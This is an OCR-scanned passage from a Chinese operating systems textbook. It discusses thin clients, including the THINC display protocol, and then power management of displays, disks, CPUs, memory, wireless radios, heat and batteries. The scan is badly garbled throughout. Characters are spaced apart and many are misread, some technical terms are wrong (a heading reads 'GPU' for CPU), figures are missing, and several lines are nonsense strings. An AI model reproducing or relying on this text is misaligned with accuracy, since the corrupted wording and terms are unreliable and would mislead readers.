



虽然 分 散 化 的 PC 模型 具有 长 处 ， 但 是 它 也 有 着 茶 些 严重 的 不 利之 

处 ， 人 们 刚刚 开始 认真 思考 这 些 不 利之 处 。 或 许 最 大 的 问题 是 ， 每 人 台 

PC 机 都 有 一 个 大 容量 的 硬盘 以 及 复杂 的 软件 必须 维护 。 例 如 ， 当 操作 

系统 的 一 个 新 版 本 发 布 时 ， 必 须 做 大 量 的 工作 分 别 在 每 台 机 器 上 进行 升 
级 。 在 大 多 数 公司 中 ， 做 这 类 软件 维护 的 荔 动 力 成 本 大 大 高 于 实际 的 硬 
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少 有 人 能 够 正确 地 做 这 件 事 ， 并 且 更 少 有 人 乐于 做 这 件 事 。 对 于 一 个 中 
心 化 的 系统 ， 只 有 一 人 台 或 几 台 机 器 必须 升级 ， 并 且 有 专家 班子 做 这 些 工 
作 。 





一 个 相关 的 问题 是 ， 用 户 应 该 定期 地 备份 他 们 的 几 吉 字 节 的 文件 系 
统 ， 但 是 很 少 有 用 户 这 样 做 。 当 灾难 约 来 时 ， 相 随 的 将 是 仰天 长 叹 和 手 
胸 顿 足 。 对 于 一 个 中 心 化 的 系统 ， 目 动 化 的 磁带 机 器 人 在 每 天 夜里 都 可 
以 做 备份 。 








中 心 化 系统 的 另 一 个 长 处 是 资源 共享 更 加 容易 。 一 个 系统 具有 256 
个 远程 用 户 ， 每 个 用 户 拥有 256MB RAM， 在 大 多 数 时 间 这 个 系统 的 这 
些 RAM 大 多 是 空闲 的 ， 然 而 某 些 用 户 临 时 需要 大 量 的 RAM 但 是 却 得 不 
到 ， 因 为 RAM 在 别人 的 PC 上 。 对 于 一 个 具有 64GB RAM 的 中 心 化 系 
统 ， 这 样 的 事情 决 不 会 发 生 。 同 样 的 论据 对 于 磁盘 空间 和 其 他 资源 也 是 
有 效 的 。 








最 后 ， 我 们 将 开始 考察 从 以 PC 为 中 心 的 计算 到 以 Web 为 中 心 的 计算 
的 转移 。 一 个 领域 是 电子 邮件 ， 在 该 领域 中 这 种 转移 是 长 远 的 。 人 们 过 
去 获取 投 送 到 他 们 家 庭 计算 机 上 的 电子 邮件 ， 并 且 在 家 庭 计算 机 上 阅 
读 。 今天， 许多 人 登录 到 Gmail、Hotmail 或 者 Yahoo 上， 并 且 在 那里 阅 
读 他 们 的 邮件 。 下 一 步 人 们 会 登录 到 其 他 网 站 中 ， 进 行 字 处 理 、 建 立 电 
子 数据 表 以 及 做 其 他 过 去 需要 PC 软件 才能 做 的 事情 。 最 后 甚至 有 可 能 
人 们 在 自己 的 PC 上 运行 的 惟一 软件 是 一 个 Web 浏 览 器 ， 或 许 甚至 没有 软 
件 。 











一 个 合理 的 结论 大 概 是 : 大 多 数 用 户 想 要 局 性 能 的 交互 式 计算 ， 但 
是 实在 不 想 管理 一 台 计 算 机 。 这 一 结论 导致 研究 人 员 重 新 研究 了 分 时 系 
统 使 用 的 哑 终 端 〈 现 在 文雅 地 称 为 瘦 客 户 机 (thin client) ) ， 它 们 符合 
现代 终端 的 期 望 。X 是 这 一 方 同 的 一 个 步骤 并 且 专 用 的 X 终 端 一 度 十 分 
流行 ， 但 是 它们 现在 已 经 失宠 ， 因 为 它们 的 价格 与 PC 相仿 ， 能 做 的 事 
情 更 少 ， 并 且 仍 然 需要 茶 些 软件 维护 。 圣 杯 Choly grail) 应 该 是 一 个 高 





性 能 的 交互 式 计算 系统 ， 在 该 系统 中 用 户 的 机 器 根本 就 没有 软件 。 十 分 
有 趣 的 是 ， 这 一 目标 是 可 以 达到 的 。 下 面 我 们 将 描述 一 个 这 样 的 瘦 客 户 
机 系统 ， 称 为 THINC， 它 是 由 哥伦比亚 大 学 的 研究 人 员 开 发 的 《Baratto 
“©, 2005; Kim 等 人 ，2006; Lai 和 Nieh，2006) 。 


此 处 的 基本 思想 是 从 客户 机 和 剥离 一 切 智 能 和 软件 ， 只 是 将 其 用 作 一 
台 显 示 器 ， 使 所 有 计算 (包括 建立 待 显 示 的 位 图 ) 都 在 服务 器 器 完 成 。 
客户 机 和 服务 器 之 间 的 协议 只 是 通知 显示 露 如何 更 新 视频 RAM， 再 无 
其 他 。 两 端 之 间 的 协议 中 使 用 了 五 条 命令 ， 它 们 列 在 图 5-44 中 。 





a 在 给 定 的 位 置 显示 原始 像素 数据 
Copy 复制 帧 缓冲 器 区 域 到 指定 的 坐标 


Sfill 以 给 定 的 像素 颜色 值 填充 一 个 区 域 
Pfill 以 给 定 的 像素 模式 填充 一 个 区 域 
Bitmap 使 用 位 图 图 像 填 充 一 个 区 域 





图 5-44 THINC 协 议 显示 命令 


现在 我 们 将 考察 这 些 命令 。Raw 用 于 传输 像素 数据 并 且 将 它们 逐 字 
地 显示 在 屏幕 上 。 原 则 上 ， 这 和 是 惟一 需要 的 命令 。 其 他 命令 只 是 为 了 优 
Wo 


Copy 指 示 显 示 器 从 其 视频 RAM 的 一 个 部 分 移动 数据 到 另 一 个 部 


。 这 对 于 滚 卷 屏幕 而 不 必 重 新 传输 所 有 数据 是 有 用 的 。 








Sfill 以 单一 的 像素 值 填充 屏幕 的 一 个 区 域 。 许 多 屏幕 具有 某 种 颜色 
的 一 致 的 背景 ， 该 命令 用 于 首先 生成 背景 ， 然 后 可 以 绘制 文本 、 图 标 和 
其 他 项 目 。 





Pfil 在 茶 个 区 域 上 复制 一 个 模式 。 它 还 可 以 用 于 背景 ， 但 是 某 些 
景 比 单一 颜色 要 复杂 一 些 ， 在 这 种 情况 下 ， 该 命令 可 以 完成 工作 。 





最 后 ，Bitmap 也 是 用 于 绘制 区 域 ， 但 是 具有 前 景色 和 背景 色 。 总 而 
言 之 ， 这 些 古 非常 简单 的 命令 ， 在 客户 端 需要 非常 少 的 软件 。 所 有 建立 
位 图 填充 屏幕 的 复杂 操作 都 是 在 服务 器 上 完成 的 。 为 了 改进 效率 ， 多 条 
命令 可 以 聚集 成 单一 的 数据 包 ， 通 过 网 络 从 服务 器 传送 到 客户 机 。 





在 服务 器 器 ， 图 形 程序 使 用 高 级 命令 以 绘制 屏幕 。 这 些 命令 被 
THINC 软 件 截 获 ， 并 且 翻 译 成 可 以 发 送 到 客户 机 的 命令 。 命 令 可 能 要 重 
排序 以 改进 效率 。 


> 
=| 


论文 通过 在 距 客 户 机 10 一 10 000km 距 离 的 服务 器 上 运行 众多 的 常用 
应 用 程序 ， 给 出 了 大 量 的 性 能 测量 。 一 般 而 言 ， 性 能 超过 了 其 他 广域网 
系统 ， 即 使 对 于 实时 视频 也 是 如 此 。 关 于 更 多 的 信息 ， 请 读者 参阅 论 





58 ”电源 管理 


第 一 代 通 用 电子 计算 机 ENIAC 具 有 180 00 个 电子 管 并 且 消 耗 140 000 
瓦 的 电力 。 结 果 ， 它 迅速 积累 起 非 同 一 般 的 电费 账单 。 唱 体 管 发 明 后 ， 
电力 的 使 用 量 戏剧 性 地 下 降 ， 并 且 计 算 机 行业 失去 了 在 电力 需求 方面 的 
兴趣 。 然 而 ， 如 今 电源 管理 由 于 若干 原因 又 像 过 去 一 样 成 为 焦点 ， 并 且 
操作 系统 在 这 里 扮演 着 重要 的 角色 。 








我 们 从 桌面 PC 开始 讨论 。 桌 面 PC 通 党 具有 200 瓦 的 电源 (其 效率 一 
般 是 85%，15% 进 来 的 能 量 损失 为 热量 ) 。 如 果 全 世界 ] 亿 台 这 样 的 机 器 
同时 开机 ， 合 起 来 它们 要 用 掉 20 000 兆 瓦 的 电力 。 这 是 20 座 中 等 规模 的 
核电 站 的 总 产 出 。 如 果 电 力 需求 能 够 削减 一 半 ， 我 们 就 可 以 削减 10 座 核 
电站 。 从 环保 的 角度 看 ， 削 减 10 座 核电 站 (或 等 价 数 目的 矿物 燃料 电 
站 ) 是 一 个 巨大 的 胜利 ， 非 常 值得 追求 。 








男 一 个 要 着 重 考 虑 电源 的 场合 是 电池 供电 的 计算 机 ， 包 括 笔 记 本 电 
、 掌 上 机 以 及 Web 便 交 夭 等 。 问 题 的 核心 是 电池 不 能 保存 尾 够 的 电 稚 
以 持续 非 营 长 的 时 间 ， 至 多 也 就 是 几 个 小 时 。 此 外 ， 尽 管 电池 公司 、 计 
算 机 公司 和 消费 性 电子 产品 公司 进行 了 巨大 的 研究 努力 ， 但 进展 仍然 绥 
慢 。 对 于 一 个 已 经 习惯 于 每 18 个 月 性 能 翻 一 番 〈 摩 尔 定律 ) 的 产业 来 
说 ， 军 无 进展 就 像 是 违背 了 物理 定律 ， 但 这 就 是 现状 。 因 此 ， 使 计算 机 
使 用 较 少 的 能 量 因 而 现 有 的 电池 能 够 持续 更 长 的 时 间 就 高 巧 在 每 个 人 的 











议事 日 程 之 上 。 操 作 系统 在 这 里 扮演 着 主要 的 角色 ， 我 们 将 在 下 面 看 到 


see = 





在 最 低 的 层次 ， 硬 件 广 商 试图 使 他 们 的 电子 装置 具有 更 高 的 能 量 效 
率 。 使 用 的 技术 包括 减少 晶体 管 的 尺寸 、 利 用 动态 电压 调节 、 使 用 低 摆 
幅 并 隔 热 的 总 线 以 及 类 似 的 技术 。 这 些 内 容 超出 了 本 书 的 范围 ， 感 兴趣 
的 读者 可 以 在 Venkatachalam 和 Franz (2005) 的 论文 中 找到 很 好 的 综 


存在 两 种 减少 能 量 消耗 的 一 般 方 法 。 第 一 种 方法 是 当 计 算 机 的 菜 些 
部 件 〈 主 要 是 WO 设备 ) 不 用 的 时 候 由 操作 系统 关闭 它们 ， 因 为 关闭 的 
设备 使 用 的 能 量 很 少 或 者 不 使 用 能 量 。 第 二 种 方法 是 应 用 程序 使 用 较 少 
的 能 量 ， 这 样 为 了 延长 电池 时 间 可 能 会 降低 用 户 体验 的 质量 。 我 们 将 依 
次 看 一 看 这 些 方法 ， 但 是 首先 束 电 源 使 用 方面 谈 一 谈 人 硬件 设 计 。 





5.8.1 硬件 问题 


电池 一 般 分 为 两 种 类 型 : 一 次 性 使 用 的 和 可 再 充电 的 。 一 次 性 使 用 
的 电池 (AAA、AA 与 D 电 池 ) 可 以 用 来 运转 党 上 设备 ， 但 是 没有 足够 
的 能 量 为 具有 大 面积 发 光 屏 幕 的 笔记 本 电脑 供电 。 相 反 ， 可 再 充电 的 电 
池 能 够 存储 足够 的 能 量 为 笔记 本 电脑 供电 几 个 小 时 。 在 可 再 充电 的 电池 
中 ， 镍 锅 电 池 曾 经 占据 主导 地 位 ， 但 是 它们 后 来 让 位 给 了 镍 所 电池 ， 镍 








气 电 池 持 续 的 时 间 更 长 并 且 当 它们 最 后 被 抛弃 时 不 如 钊 锅 电 池 污 染 环境 
那么 严重 。 锂 电池 更 好 一 些 ， 并 且 不 需要 首先 完全 耗 尽 就 可 以 再 充电 ， 
但 是 它们 的 容量 同样 非常 有 限 。 








大 多 数 计算 机 厂商 对 于 电池 节约 采取 的 一 般 措施 是 将 CPU、 内 存 以 
及 IO 设备 设计 成 具有 多 种 状态 : 工作 、 睡 眠 、 休 虐 和 关闭 。 要 使 用 设 
备 ， 它 必须 处 于 工作 状态 。 当 设备 在 短 时 间 内 和 暂时 不 使 用 时 ， 可 以 将 其 
置 于 睡眠 状态 ， 这 样 可 以 减少 能 量 消耗 。 当 设备 在 一 个 较 长 的 时 间 间 陋 
内 不 使 用 时 ， 可 以 将 其 置 于 休眠 状态 ， 这 样 可 以 进一步 减少 能 量 消 耗 。 
这 里 的 权衡 是 ， 使 一 个 设备 脱离 休眠 状态 常常 比 使 一 个 设备 脱离 睡眠 状 
态 人 花费 更 多 的 时 间 和 能 量 。 最 后 ， 当 一 个 设备 关闭 时 ， 它 什么 事情 也 不 
做 并 且 也 不 消耗 电能 。 并 非 所 有 的 设备 都 具有 这 些 状态 ， 但 是 当 它 们 具 
有 这 些 状态 时 ， 应 该 由 操作 系统 在 正确 的 时 机 管理 状态 的 变迁 。 











某 些 计算 机 具有 两 个 甚至 三 个 电源 按钮 。 这 些 按钮 之 一 可 以 将 整个 
计算 机 置 于 睡眠 状态 ， 通 过 键入 一 个 字符 或 者 移动 鼠标 ， 能 够 从 该 状态 
快速 地 唤醒 计算 机 。 必 一 个 按钮 可 以 将 计算 机 置 于 休眠 状态 ， 从 该 状态 
唤醒 计算 机 花费 的 时 间 要 长 得 多 。 在 这 两 种 情况 下 ， 这 些 按钮 通常 除了 
发 送 一 个 信号 给 操作 系统 外 什么 也 不 做 ， 剩 下 的 事情 由 操作 系统 在 软件 
中 处 理 。 在 东 些 国家 ， 依 照 法 律 ， 电 气 设 备 必 须 具 有 一 个 机 械 的 电源 开 
关 ， 出 于 安全 性 考虑 ， 该 开关 可 以 切断 电路 并 且 从 设备 撤去 电能 。 为 了 
遵守 这 一 法 律 ， 可 能 需要 男 一 个 开关 。 


电源 管理 提出 了 操作 系统 必须 处 理 的 右 干 问题 ， 其 中 许多 问题 涉及 
资源 休眠 一 一 选择 性 地 、 临 时 性 地 关闭 设备 ， 或 者 至 少 当 它 们 空 用 时 减 
少 它们 的 功率 消耗 。 必 须 回答 的 问题 包括 : 哪些 设备 能 够 被 控制 ? 它们 
是 工作 的 还 是 关闭 的 ， 或 者 它们 具有 中 间 状 态 吗 ? 在 低 功 耗 状态 下 节省 
了 多 少 电能 ? 重启 设备 消耗 能 量 吗 ? 当 进 入 低 功 耗 状态 时 是 不 是 必须 保 
存 东 些 上 下 文 ? 返回 到 全 功 耗 状态 要 人 花费 多 长 时 间 ? 当然 ， 对 这 些 问 题 
的 回答 是 随 设 备 而 变化 的 ， 所 以 操作 系统 必须 能 够 处 理 一 个 可 能 性 的 范 
围 。 














许多 研究 人 员 研 究 了 笔记 本 电脑 以 了 解 电能 的 去 向 。Li 等 人 
(1994) 测量 了 各 种 各 样 的 工作 负荷 ， 得 出 的 结论 如 图 5-45 所 示 。 
Lorch 和 Smith (1998) 在 其 他 机 器 上 进行 了 测量 ， 得 出 的 结论 如 图 5-45 
所 示 。Weiser 等 人 〈1994) 也 进行 了 测量 ， 但 是 没有 发 表 数 值 结 末 。 这 
些 结论 清楚 地 说 明 能 量 吸收 的 前 三 名 依次 是 显示 器 、 硬 盘 和 CPU。 可 能 
因为 测量 的 不 同 品牌 的 计算 机 确实 具有 不 同 的 能 量 需 求 ， 这 些 数字 并 不 
紧密 地 吻合 ， 但 是 很 显然 ， 显 示 器 、 硬 盘 和 CPU 是 节约 能 量 的 目标 。 























设备 


Lorch 和 Smith (1998) 
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图 5-45 笔记 本 电脑 各 部 件 的 功率 消耗 
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5.8.2 ”操作 系统 问题 





操作 系统 在 能 量 管 理 上 扮演 着 一 个 重要 的 角色 ， 它 控制 着 所 有 的 设 
备 ， 所 以 它 必 须 决定 关闭 什么 设备 以 及 何 时 关闭 。 如 采 它 关闭 了 一 个 设 
备 并 且 该 设备 很 快 再 次 补 用 户 需 要 ， 可 能 在 设备 重启 时 存在 恼人 的 延 
Ko ATA, WREST SAKINA AAS, Beet AR 
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这 里 的 技巧 是 找到 算法 和 试探 法 ， 让 操作 系统 对 关于 关闭 什么 设备 
以 及 何 时 关闭 能 够 作出 展 好 的 决策 。 问 题 是 “ 展 好 ?是 高 度 主观 的 。 一 
用 户 可 能 觉得 在 30s 未 使 用 计算 机 之 后 计算 机 要 花费 2s 的 时 间 啊 应 击 键 
是 可 以 接受 的 。 男 一 个 用 户 在 相同 的 条 件 下 可 能 会 发 出 一 连 串 的 诅 殉 














1. 显 示 器 








现在 我 们 来 看 一 看 能 量 预算 的 几 大 消耗 者 ， 考 虑 一 下 对 于 它们 能 够 
做 些 什 么 。 在 每 个 人 的 能 量 预算 中 最 大 的 项 目 是 显示 器 。 为 了 获得 明 腕 
而 请 晰 的 图 像 ， 屏 幕 必 须 是 背光 照明 的 ， 这 样 会 消耗 大 量 的 能 量 。 许 多 
操作 系统 试图 通过 当 几 分 钟 的 时 间 没 有 活动 时 关闭 显示 右 而 市 省 能 量 。 
通常 用 户 可 以 决定 关闭 的 时 间 间 隔 ， 因 此 将 屏幕 频繁 地 煜 灭 和 很 快 用 光 
电池 之 间 的 折 中 推 回 给 用 户 用户 可 能 实际 上 并 不 希望 这 样 ) o RAE 
示 需 是 一 个 睡眠 状态 ， 因 为 当 任意 键 被 敌 击 或 者 定点 设备 移动 时 ， 














人 够 〈 从 视频 RAM) 即时 地 再 生 。 


Flinn 和 Satyanarayanan (2004) 提出 了 一 种 可 能 的 改进 。 他 们 建议 
让 显示 器 由 若干 数目 的 区 域 组 成 ， 这 些 区 域 能 够 独立 地 开启 和 关闭 。 在 
图 5-46 中 ， 我 们 描述 了 16 个 区 域 ， 使 用 虚线 分 开 它 们 。 当 光标 在 窗口 2 
中 的 时 候 ， 如 图 5-46a 所 示 ， 只 有 右 下 角 的 4 个 区 域 必须 点 亮 。 其 他 12 个 
区 域 可 以 是 黑暗 的 ， 市 省 了 3/4 的 屏 磊 功 耗 。 











当 用 户 移动 鼠标 到 窗口 1 时 ， 窗 口 2 的 区 域 可 以 变 上 暗 并 且 窗 口 1 后 面 
的 区 域 可 以 开启 。 然 而 ， 因 为 窗口 ] 横 跨 9 个 区 域 ， 所 以 需要 更 多 的 电 
能 。 如 果 窗 口 管理 器 能 够 感知 正在 发 生 的 事情 ， 它 可 以 通过 一 种 对 齐 区 
域 的 动作 自动 地 移动 窗口 1 以 适合 4 个 区 域 ， 如 图 5-46b 所 示 。 为 了 达到 
这 一 从 9/16 全 功率 到 4/16 全 功率 的 缩减 ， 窗 口 管理 器 必须 理解 电源 管理 
或 者 能 够 从 系统 的 某 些 其 他 做 这 些 工 作 的 部 分 接收 指令 。 更 加 复杂 的 是 
能 够 部 分 地 照 亮 不 完全 充满 的 窗口 〈 例 如 ， 包 含 文本 短线 的 窗口 可 以 在 
右手 边 保 持 黑暗 ) 。 








图 5-46 针对 背光 照明 的 显示 器 使 用 区 域 : a) 当 窗口 2 被 选中 时 ， 该 窗 
口 不 移动 ; b) 当 窗口 1 被 选中 时 ， 该 窗口 移动 以 减少 照明 的 区 域 的 数目 


2. 便 盘 


另 一 个 主要 的 袖 首 是 硬盘 ， 它 消耗 大 量 的 能 量 以 保持 高 速 旋转 ， 即 
使 不 存在 存 取 操 作 。 许 多 计算 机 ， 特 别 是 笔记 本 电脑 ， 在 几 秒 钟 或 者 几 
分 钟 不 活动 之 后 将 停止 磁盘 旋转 。 当 下 一 次 需要 磁盘 的 时 候 ， 磁 盘 将 再 
次 开始 旋转 。 不 羊 的 是 ， 一 个 停止 的 磁盘 是 休眠 而 不 是 睡眠 ， 因 为 要 人 花 
费 相 当 多 的 时 间 将 磁盘 再 次 旋转 起 来 ， 导 致 用 户 感 到 明显 的 延迟 。 











此 外 ， 重 新 启动 磁盘 将 消耗 相当 多 额外 的 能 量 。 因 此 ， 每 个 磁盘 都 
有 一 个 特征 时 间 Ta AG AY oP A) Tg 通 间 在 5 一 15s 的 范围 之 间 。 
假设 下 一 次 磁盘 存 取 预 计 在 未 来 的 茶 个 时 间 t 到 来 。 如 果 t< Ta ， 那 么 保 
持 磁 盘旋 转 比 将 其 停止 然后 很 快 再 将 其 开局 要 消耗 更 少 的 能 量 。 如 打 { 
>Td ， 那 么 使 得 磁盘 停止 而 后 在 较 长 时 间 后 再 次 启动 磁盘 是 十 分 值得 














的 。 如 果 可 以 做 出 良好 的 预测 (例如 基于 过 去 的 存 取 模 式 ) ， 那 么 操作 
系统 就 能 够 做 出 民 好 的 关闭 预测 并 且 节 省 能 量 。 实 际 上 ， 大 多 数 操作 系 
统 是 保守 的 ， 往 往 是 在 几 分 钟 不 活动 之 后 才 集 止 磁盘 。 


节省 磁盘 能 量 的 另 一 种 方法 是 在 RAM 中 拥有 一 个 大 容量 的 磁盘 高 
速 缓存 。 如 果 所 需要 的 数据 块 在 高 速 缓存 中 ， 空 朵 的 磁盘 就 不 必 为 满足 
读 操 作 而 重新 启动 。 类 似 地 ， 如 果 对 磁盘 的 写 操作 能 够 在 高 速 缓存 中 组 
冲 ， 一 个 停止 的 磁盘 就 不 必 只 为 了 处 理 写 操作 而 重新 局 动 。 磁 盘 可 以 保 
持 关 闭 状态 和 直到 高 速 缓存 填 满 或 者 读 缺 失 发 生 。 











避免 不 必要 的 磁盘 局 动 的 另 一 种 方法 是 : 操作 系统 通过 发 送 消 妃 或 
言 号 保持 将 磁盘 的 状态 通知 给 正在 运行 的 程序 。 某 些 程序 具有 可 以 自由 
决定 的 写 操作 ， 这 样 的 写 操作 可 以 被 略 过 或 者 推迟 。 例 如 ， 一 个 字 处 理 
程序 可 能 被 设置 成 每 阳 几 分 钟 将 正在 编辑 的 文件 写 入 磁盘 。 如 果 字 处 理 
程序 知道 当 它 在 正常 情况 下 应 该 将 文件 写 到 磁盘 的 时 刻 磁 盘 是 关闭 的 ， 
它 就 可 以 将 本 次 与 操作 推迟 直到 下 一 次 磁盘 开局 时 ， 或 者 直到 东 个 附加 
的 时 间 逝 去 。 











3.GPU 


CPU 也 能 够 被 管理 以 节省 能 量 。 笔 记 本 电脑 的 CPU 能 够 用 软件 置 为 
睡眠 状态 ， 将 电能 的 使 用 减少 到 几乎 为 零 。 在 这 一 状态 下 CPU 惟一 能 做 
的 事情 是 当中 断 发 生 时 醒 来 。 因 此 ， 只 要 CPU 变 为 空 亲 ， 无 论 是 因为 等 











待 O 还 是 因为 没有 工作 要 做 ， 它 都 可 以 进入 睡眠 状态 。 


在 许多 计算 机 上 ， 在 CPU 电压 、 时 钟 周 期 和 电能 消耗 之 间 存 在 着 关 
系 。CPU 电 压 可 以 用 软件 降低 ， 这 样 可 以 节省 能 量 但 是 也 会 《近似 线性 
地 ) 降低 时 钟 速度 。 由 于 电能 消耗 与 电压 的 平方 成 正比 ， 将 电压 降低 一 
半 会 使 CPU 的 速度 减 慢 一 半 ， 而 电能 消耗 降低 到 只 有 1/4。 





对 于 具有 明确 的 最 终 时 限 的 程序 而 言 ， 这 一 特性 可 以 得 到 利用 ， 例 
如 多 媒体 观察 器 必须 每 40ms 解 压缩 并 显示 一 帧 ， 但 是 如 果 它 做 得 太 快 它 
就 会 变 得 空间 。 假 设 CPU 全 速 运 行 40ms 消 耗 了 x 焦耳 能 量 ， 那 么 半 速 运 
行 则 消耗 x/4 焦 年 的 能 量 。 如 果 多 媒体 观察 右 能 够 在 20ms 内 解压 缩 并 显 
示 一 帧 ， 那 么 操作 系统 能 够 以 全 功率 运行 20ms， 然 后 关闭 20ms， 总 的 
能 量 消耗 是 x/2 焦 耳 。 作 为 蔡 代 ， 它 能 够 以 半 功 率 运 行 并 且 恰 好 满足 最 
终 时 限 ， 但 是 能 量 消耗 是 x/4 焦 耳 。 以 全 速 和 全 功率 运行 某 个 时 间 间 隔 
与 以 半 速 和 四 分 之 一 功率 运行 两 倍 长 时 间 的 比较 如 图 5-47 所 示 。 在 这 两 
种 情况 下 做 了 相同 的 工作 ， 但 是 在 图 5-47b 中 只 消耗 了 一 半 的 能 量 。 

















功率 

















图 5-47 以 全 时 钟 速度 运行 ; D) 电 压 减 半 使 时 钟 速 度 削 减 一 半 并 且 
功率 削减 到 1/4 


类 似 地 ， 如 果 用 户 以 每 秒 1 个 字符 的 速度 键入 字符 ， 但 是 处 理 字符 
所 需 的 工作 要 花费 100ms 的 时 间 ， 操 作 系 统 最 好 检测 出 长 时 间 的 空间 周 
期 并 且 将 CPU 放 慢 10 倍 。 简 而 言 之 ， 慢 速 运行 比 快速 运行 具有 更 局 的 能 
效率 。 








al 


4. 内 存 








对 于 内 存 ， 存 在 两 种 可 能 的 选择 来 节省 能 量 。 首 先 ， 可 以 刷新 然后 
关闭 高 速 缓存 。 高 速 缓存 总 是 能 够 从 内 存 重 新 加 载 而 不 损失 信息 。 重 新 
加 载 可 以 动态 并 且 快 速 地 完成 ， 所 以 关闭 高 速 缓存 是 进入 睡眠 状态 。 

















更 加 极端 的 选择 是 将 主 存 的 内 容 写 到 磁盘 上 ， 然 后 关闭 主 存 本 身 。 
这 种 方法 是 休眠 ， 因 为 实际 上 所 有 到 内 存 的 电能 都 被 切断 了 ， 其 代价 是 
相当 长 的 重新 加 载 时 间 ， 尤 其 是 如 果 磁 盘 也 被 关闭 了 的 话 。 当 内 存 被 切 
吴 时 ，CPU 或 者 也 被 关闭 ， 或 者 必须 自 ROM 执 行 。 如 果 CPU 被 关闭， 将 
其 唤醒 的 中 断 必须 促使 它 跳 转 到 ROM 中 的 代码 ， 从 而 能 够 重新 加 载 内 
存 并 且 使 用 内 存 。 尽 管 存在 所 有 这 些 开销 ， 将 内 存 关闭 较 长 的 时 间 周 期 
(例如 几 个 小 时 〉 也许 是 值得 的 。 与 常常 要 花费 一 分 钟 或 者 更 长 时 间 从 
磁盘 重新 启动 操作 系统 相 比 ， 在 几 秒 钟 之 内 重新 启动 内 存 想来 更 加 受 欢 


迎 。 





5. 无 线 通 信 


越 来 越 多 的 便携 式 计算 机 拥有 到 外 部 世界 《例如 Internet) 的 无 线 连 
接 。 无 线 通 信 必 需 的 无 线 电 发 送 器 和 接收 器 是 头等 的 电能 贪 吃 者 。 特 别 
是 ， 如 果 无 线 电 接收 器 为 了 侦 听 到 来 的 电子 邮件 而 始终 开 看 ， 电 池 可 能 
很 快 耗 干 。 另 一 方面 ， 如 果 无 线 电 设备 在 1 分 钟 空闲 之 后 关闭 ， 那 么 就 


可 能 会 错过 到 来 的 消息 ， 这 显然 是 不 受 欢迎 的 。 





针对 这 一 问题 ，Kravets 和 Krishnan (1998) 提出 了 一 种 有 效 的 解决 
方案 。 他 们 的 解决 方案 的 核心 利用 了 这 样 的 事实 ， 即 移动 的 计算 机 是 与 
固定 的 基站 通信 ， 而 固定 基站 具有 大 容量 的 内 存 与 磁盘 并 且 没 有 电源 限 
制 。 他 们 的 解决 方案 是 当 移动 计算 机 将 要 关闭 无 线 电 设备 时 ， 让 移动 计 
算 机 发 送 一 条 消息 到 基站 。 从 那 时 起 ， 基 站 在 其 磁盘 上 缓冲 到 来 的 消 
息 。 当 移动 计算 机 再 次 打开 无 线 电 设备 时 ， 它 会 通知 基站 。 此 刻 ， 所 有 
让 累 的 消息 可 以 发 送 给 移动 计算 机 。 

















当 无 线 电 设备 关闭 时 ， 生 成 的 外 发 的 消息 可 以 在 移动 计算 机 上 组 
冲 。 如 果 绥 冲 区 有 填 满 的 危险 ， 可 以 将 无 线 电 设备 打开 并 且 将 排队 的 消 
恩 发 送 到 基站 。 


应 该 在 何 时 将 无 线 电 设备 关闭 ?一 种 可 能 是 让 用 户 或 应 用 程序 来 决 
定 。 必 一 种 方法 是 在 徊 干 秒 的 空闲 时 间 之 后 将 其 天 财 。 应 该 在 何 时 将 无 
线 电 设备 再 次 打开 ?用 户 或 应 用 程序 可 以 再 一 次 做 出 决定 ， 或 者 可 以 周 





期 性 地 将 其 打开 以 检查 到 来 的 消息 并 且 发 送 所 有 排队 的 消 轧 。 当 然 ， 当 
和 输出 缓冲 区 接近 填 满 时 也 应 该 将 其 打开 。 各 种 各 样 的 其 他 休眠 方法 也 是 





6. 热 量 管理 


一 个 有 一 点 不 同 但 是 仍然 与 能 量 相关 的 问题 是 热量 管理 。 现 代 CPU 
由 于 高 速度 而 会 变 得 非 第 热 。 呆 面 计 算 机 通常 拥有 一 个 内 部 电 风 局 将 热 
空气 吹出 机 箱 。 由 于 对 于 果 面 计算 机 来 说 减少 功率 消耗 通常 并 不 是 一 个 
重要 的 问题 ， 所 以 风 书 通常 是 始终 开 痢 的 。 








对 于 笔记 本 电脑 ， 情 况 是 不 同 的 。 操 作 系 统 必 须 连 续 地 监视 温度 ， 
当 如 上 度 接近 最 大 可 人 允许 温度 时 ， 操 作 系 统 可 以 选择 打开 风 书 ， 这 样 会 友 
出 噪音 并 且 消 耗 电 能 。 作 为 蔡 代 ， 它 也 可 以 借助 于 降低 屏幕 背光 、 放 慢 
CPU 速度 、 更 为 激进 地 关闭 磁盘 等 来 降低 功率 消耗 。 


来 目 用 户 的 茶 些 输入 也 许 是 鼎 有 价值 的 指导 。 例 如 ， 用 户 可 以 预 乞 
设 定 风 书 的 噪音 是 令 人 不 快 的 ， 因 而 操作 系统 将 选择 降低 功率 消耗 。 








7. 电 池 管 理 


在 过 去 ， 电 池 仪 仅 提 供电 流 直 到 其 耗 干 ， 在 耗 干 时 电池 就 不 会 再 有 
电 了 。 现 在 笔记 本 电脑 使 用 的 是 智能 电池 ， 它 可 以 与 操作 系统 通信 。 在 
请 求 时 ， 它 可 以 报告 其 状况 ， 例 如 最 大 电压 、 当 前 电压 、 最 大 负 蓓 、 





IIK 


前 负荷 、 最 大 消耗 速率 、 当 前 消耗 速率 等 。 大 多 数 笔 记 本 电脑 拥有 能 够 
查询 与 显示 这 些 参数 的 程序 。 在 操作 系统 的 控制 下 ， 还 可 以 命令 智能 电 
池 改 变 各 种 工作 参数 。 








某 些 笔记 本 电脑 拥有 多 块 电池 。 当 操作 系统 检测 到 一 块 电 池 将 要 用 
完 时 ， 它 必须 适度 地 安排 转换 到 下 一 块 电池 ， 在 转换 期 间 不 能 导致 任何 
故障 。 当 最 后 一 块 电池 濒临 耗 尽 时， 操作 系统 要 负 贡 向 用 户 发 出 警告 然 
后 促成 有 序 的 关机 ， 例 如 ， 确 保 文件 系统 不 被 破坏 。 











8. 驱 动 程序 接口 


Windows 系 统 拥 有 一 个 进行 电源 管理 的 精巧 的 机 制 ， 称 为 
ee ae ee ee 
。 操 作 系统 可 以 向 任何 符合 标准 的 驱动 程序 发 出 命令 ， 要 求 它 报告 
其 设备 的 性 能 以 及 它们 当前 的 状态 。 当 与 即 插 即 用 相 结合 时 ， 该 特性 万 
其 重要 ， 因 为 在 系统 刚刚 引导 之 后 ， 操 作 系 统 甚至 还 不 知道 存在 什么 设 
备 ， 更 不 用 说 它们 关于 能 量 消耗 或 电源 管理 的 属性 了 。 


